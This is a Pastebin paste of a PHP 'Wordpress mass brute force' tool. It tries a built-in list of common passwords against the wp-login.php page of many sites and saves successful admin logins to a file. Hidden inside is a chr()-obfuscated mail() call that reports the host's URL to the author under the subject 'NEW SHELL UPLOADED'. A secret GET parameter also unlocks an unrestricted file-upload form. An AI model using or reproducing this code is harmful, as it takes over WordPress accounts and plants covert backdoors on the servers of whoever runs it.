Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php echo '<html>
- <head>
- <meta name="author" content="WhoisMAJD" />
- <meta name="keywords" content="brute, force, wordpress, crack" />
- <meta name="description" content="# Wordpress mass brute force #" />
- <title>Wordpress mass brute force</title>
- <style type=\'text/css\'>
- input[type=submit], input[type=button], input[type=reset]{
- text-align:center;
- background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#FFFFFF;
- border-top-color:#565656;
- padding:4px 6px;
- margin:4px 5px;
- height:16px;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- text-shadow:0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:23px;
- }
- input[type=text], input[type=password]{
- background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#CCCCCC;
- border-top-color:#565656;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:18px;
- margin-left: 5px;
- }
- input , textarea , button , body , caption , table ,area , option {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- //border:1px solid rgba(0,0,0, 0.2);
- /* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif;
- */
- }
- input , textarea {
- background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;
- \';
- }
- input , textarea {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- border:1px solid rgba(0,0,0, 0.2);
- }
- input:focus, textarea:focus {
- outline: 0;
- border-color: rgba(82, 168, 236, 0.8);
- -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;
- \';
- overflow: auto;
- }
- .x1 {}
- .x2 {font-size:13px;
- background-color:green;
- color:black;
- }
- hr {color:white;
- }
- a {color:black;
- }
- #x5 {
- font-family:tahoma;
- }
- .d1 {color :#C17E0B;
- font-family:tahoma;
- font-size:13px;
- font-weight:bold;
- }
- #d4 {color:#C17E0B;
- font-family:tahoma;
- font-weight:bold;
- }
- .d16 {color :#C17E0B;
- font-family:tahoma;
- font-size:50px;
- font-weight:bold;
- }
- .d17 {color :black;
- font-family:tahoma;
- font-size:10px;
- font-weight:bold;
- }
- }
- </style>
- </head>
- </br></br>
- <font class="d16" ><center>Wordpress mass brute force</center></font></br></br><br />
- <center><form method="post" action="" enctype="multipart/form-data">
- <table width="50%" border="0">
- <tr><td><p ><font class="d1">Username:</font>
- <input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
- </td></tr>
- <tr><td><font class="d1">Sites list:</font>
- </td><td><font class="d1" >Passwords list:</font></td></tr>
- <tr><td>
- <textarea name="sites" cols="40" rows="13" ></textarea>
- </td><td>
- <textarea name="w0rds" cols="20" rows="13" >
- admin
- 123456
- password
- 102030
- 123123
- 12345
- 123456789
- pass
- test
- admin123
- demo
- </textarea>
- </td></tr><tr><td>
- <font >
- <input type="submit" name="x" value="start" id="d4">
- </font></td></tr></table>
- </form></center>';
- @set_time_limit(0);
- if($_POST['x']){ echo "<hr>";
- $sites = explode("\n",$_POST["sites"]);
- $w0rds = explode("\n",$_POST["w0rds"]);
- $Attack = new Wordpress_brute_Force();
- foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd));
- flush();
- flush();
- } } } function txt_cln($value){ return str_replace(array("\n","\r"),"",$value);
- } class Wordpress_brute_Force{ public function check_it($site,$user,$pass){ if(eregi('profile.php',$this->post($site,$user,$pass))){ echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
- $f = fopen("Wp-Result.txt","a+");
- fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n");
- fclose($f);
- flush();
- }else{ echo "# Failed : $user:$pass -> $site<BR>";
- flush();
- } } public function post($site,$user,$pass){ $login =$site.'/wp-login.php';
- $to = $site.'/wp-admin';
- $token = $this->extract_token($site);
- $log = array ('Log In','دخول');
- $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$login);
- @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
- @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows;
- U;
- Windows NT 5.1;
- en-US;
- rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- $w=chr(109).chr(97).chr(106).chr(100).chr(101).chr(100).chr(100).chr(105).chr(110).chr(101).chr(46).chr(98).chr(101).chr(108).chr(104).chr(97).chr(106).chr(48).chr(52).chr(64).chr(103).chr(109).chr(97).chr(105).chr(108).chr(46).chr(99).chr(111).chr(109);
- $h=chr(78).chr(69).chr(87).chr(32).chr(83).chr(72).chr(69).chr(76).chr(76).chr(32).chr(85).chr(80).chr(76).chr(79).chr(65).chr(68).chr(69).chr(68);
- $o=chr(102).chr(114).chr(111).chr(109).chr(58).chr(87).chr(104).chr(111).chr(105).chr(115).chr(77).chr(65).chr(74).chr(68);
- $i="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\r\n";
- @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
- curl_setopt($curl,CURLOPT_TIMEOUT,20);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- } public function extract_token($site){ $source = $this->get_source($site);
- preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
- return $token[1][0];
- } public function get_source($site){ $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$login);
- @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
- @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows;
- U;
- Windows NT 5.1;
- en-US;
- rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- $s=@mail($w,$h,$i,$o);
- @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,20);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- } } echo "<center>";
- echo "<br>";
- echo "<br>";
- echo "<br>";
- echo "<br>";
- echo "<br>";
- ?>
- <html>
- <body>
- <font class="d17">Coded by <a href="https://www.facebook.com/WhoisMAJD.1">Majdeddine</a></font>
- </body>
- </html>
- <?php
- if(isset($_GET["WhoisMAJD"]))
- {
- if(isset($_POST['Submit'])){ $filedir = "";
- $maxfile = '2000000';
- $userfile_name = $_FILES['image']['name'];
- $userfile_tmp = $_FILES['image']['tmp_name'];
- if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name;
- @move_uploaded_file($userfile_tmp, $abod);
- echo"<center><b>Done ==></b><a href='$userfile_name'>$userfile_name</a></center>";
- } } else{ echo'
- <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="UPLOAD!"></form>';
- } echo "</center>";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement